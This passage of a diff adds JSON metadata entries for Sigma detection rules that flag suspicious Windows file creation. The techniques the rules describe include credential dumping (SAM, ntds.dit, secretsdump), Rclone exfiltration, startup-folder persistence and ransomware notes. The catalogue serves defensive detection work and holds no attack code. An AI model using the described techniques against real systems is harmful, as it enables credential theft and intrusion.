written by QuarksPwDump password dumper", + "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "value": "QuarksPwDump Dump File", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2018/02/10", + "filename": "file_event_win_quarkspw_filedump.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Rclone config file being created", + "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "value": "Rclone Config File Creation", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2021/05/26", + "filename": "file_event_win_rclone_exec_file.yml", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "level": "high", + "falsepositive": [ + "Legitimate Rclone usage (rare)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "value": "RedMimicry Winnti Playbook Dropped File", + "meta": { + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/06/24", + "filename": "file_event_win_redmimicry_winnti_filedrop.yml", + "author": "Alexander Rausch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "value": "Remote Credential Dump", + "meta": { + "refs": [ + "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/11/16", + "filename": "file_event_win_remote_cred_dump.yml", + "author": "SecurityAura", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", + "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "value": "RipZip Attack on Startup Folder", + "meta": { + "refs": [ + "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" + ], + "tags": [ + "attack.t1547", + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "file_event_win_ripzip_attack.yml", + "author": "Greg (rule)", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "value": "SAM Dump File Creation", + "meta": { + "refs": [ + "https://github.com/search?q=CVE-2021-36934", + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/FireFart/hivenightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/02/11", + "filename": "file_event_win_sam_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rare cases of administrative activity" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", + "value": "ScreenConnect Temporary Installation Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "file_event_win_screenconnect_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "value": "Created Files by Office Applications", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.execution" + ], + "creation_date": "2021/08/23", + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows executable that writes files to suspicious folders", + "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "value": "Windows Shell File Write to Suspicious Folder", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" + ], + "tags": "No established tags", + "creation_date": "2021/11/20", + "filename": "file_event_win_shell_write_susp_directory.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects windows executables that writes files with suspicious extensions", + "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "value": "Windows Binaries Write Suspicious Extensions", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/12", + "filename": "file_event_win_shell_write_susp_files_extensions.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "value": "Startup Folder File Write", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2020/05/02", + "filename": "file_event_win_startup_folder_file_write.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "value": "Suspicious ADSI-Cache Usage By Unknown Tool", + "meta": { + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], + "creation_date": "2019/03/24", + "filename": "file_event_win_susp_adsi_cache_usage.yml", + "author": "xknow @xknow_infosec, Tim Shelton", + "level": "high", + "falsepositive": [ + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", + "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", + "value": "Suspicious CLR Logs Creation", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1218" + ], + "creation_date": "2020/10/12", + "filename": "file_event_win_susp_clr_logs.yml", + "author": "omkar72, oscd.community, Wojciech Lesicki", + "level": "high", + "falsepositive": [ + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "value": "Suspicious Creation with Colorcpl", + "meta": { + "refs": [ + "https://twitter.com/eral4m/status/1480468728324231172?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "creation_date": "2022/01/21", + "filename": "file_event_win_susp_colorcpl.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "value": "Created Files by Microsoft Sync Center", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/04/28", + "filename": "file_event_win_susp_creation_by_mobsync.yml", + "author": "elhoim", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "value": "Suspicious Files in Default GPO Folder", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" + ], + "tags": [ + "attack.t1036.005", + "attack.defense_evasion" + ], + "creation_date": "2022/04/28", + "filename": "file_event_win_susp_default_gpo_dir_write.yml", + "author": "elhoim", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "value": "Suspicious Desktopimgdownldr Target File", + "meta": { + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ], + "creation_date": "2020/07/03", + "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", + "value": "Suspicious desktop.ini Action", + "meta": { + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2020/03/19", + "filename": "file_event_win_susp_desktop_ini.yml", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "level": "medium", + "falsepositive": [ + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Ransomware create txt file in the user Desktop", + "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "value": "Suspicious Creation TXT File in User Desktop", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2021/12/26", + "filename": "file_event_win_susp_desktop_txt.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", + "value": "Creation of a Diagcab", + "meta": { + "refs": [ + "https://threadreaderapp.com/thread/1533879688141086720.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" + ], + "tags": [ + "attack.resource_development" + ], + "creation_date": "2022/06/08", + "filename": "file_event_win_susp_diagcab.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate microsoft diagcab" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "value": "Suspicious Double Extension Files", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ], + "creation_date": "2022/06/19", + "filename": "file_event_win_susp_double_extension.yml", + "author": "Nasreddine Bencherchali, frack113", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of an executable by another executable", + "uuid": "297afac9-5d02-4138-8c58-b977bac60556", + "value": "Creation of an Executable by an Executable", + "meta": { + "refs": [ + "Malware Sandbox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2022/03/09", + "filename": "file_event_win_susp_dropper.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Software installers", + "Update utilities" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "value": "Suspicious MSExchangeMailboxReplication ASPX Write", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2022/02/25", + "filename": "file_event_win_susp_exchange_aspx_write.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "uuid": "74babdd6-a758-4549-9632-26535279e654", + "value": "Suspicious Executable File Creation", + "meta": { + "refs": [ + "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "creation_date": "2022/09/05", + "filename": "file_event_win_susp_executable_creation.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "value": "Suspicious Get-Variable.exe Creation", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/04/23", + "filename": "file_event_win_susp_get_variable.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", + "value": "Suspicious LNK Double Extension Files", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ], + "creation_date": "2022/11/07", + "filename": "file_event_win_susp_lnk_double_extension.yml", + "author": "Nasreddine Bencherchali, frack113", + "level": "medium", + "falsepositive": [ + "Users creating a shortcut on e.g. desktop" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", + "value": "Suspicious Process Writes Ntds.dit", + "meta": { + "refs": [ + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" + ], + "creation_date": "2022/01/11", + "filename": "file_event_win_susp_ntds_dit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "value": "Suspicious PFX File Creation", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2020/05/02", + "filename": "file_event_win_susp_pfx_file_creation.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "System administrators managing certififcates." + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "value": "PowerShell Profile Modification", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://persistence-info.github.io/Data/powershellprofile.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" + ], + "creation_date": "2019/10/24", + "filename": "file_event_win_susp_powershell_profile.yml", + "author": "HieuTT35, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "System administrator create Powershell profile manually" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", + "value": "Suspicious PROCEXP152.sys File Created In TMP", + "meta": { + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ], + "creation_date": "2019/04/08", + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "level": "medium", + "falsepositive": [ + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "value": "Drop Binaries Into Spool Drivers Color Folder", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/28", + "filename": "file_event_win_susp_spool_drivers_color_drop.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "value": "Suspicious Startup Folder Persistence", + "meta": { + "refs": [ + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2022/08/10", + "filename": "file_event_win_susp_startup_folder_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate usage of some of the extensions mentioned in the rule" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "value": "Suspicious Interactive PowerShell as SYSTEM", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/07", + "filename": "file_event_win_susp_system_interactive_powershell.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "value": "Suspicious Scheduled Task Write to System32 Tasks", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1053" + ], + "creation_date": "2021/11/16", + "filename": "file_event_win_susp_task_write.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of log files during a TeamViewer remote session", + "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "value": "TeamViewer Remote Session", + "meta": { + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/01/30", + "filename": "file_event_win_susp_teamviewer_remote_session.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate uses of TeamViewer in an organisation" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "value": "VsCode Powershell Profile Modification", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" + ], + "creation_date": "2022/08/24", + "filename": "file_event_win_susp_vscode_powershell_profile.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use of the profile by developers or administrators" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of an file in user Word Startup", + "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "value": "Creation In User Word Startup Folder", + "meta": { + "refs": [ + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2022/06/05", + "filename": "file_event_win_susp_winword_startup.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Addition of legitimate plugins" + ], + 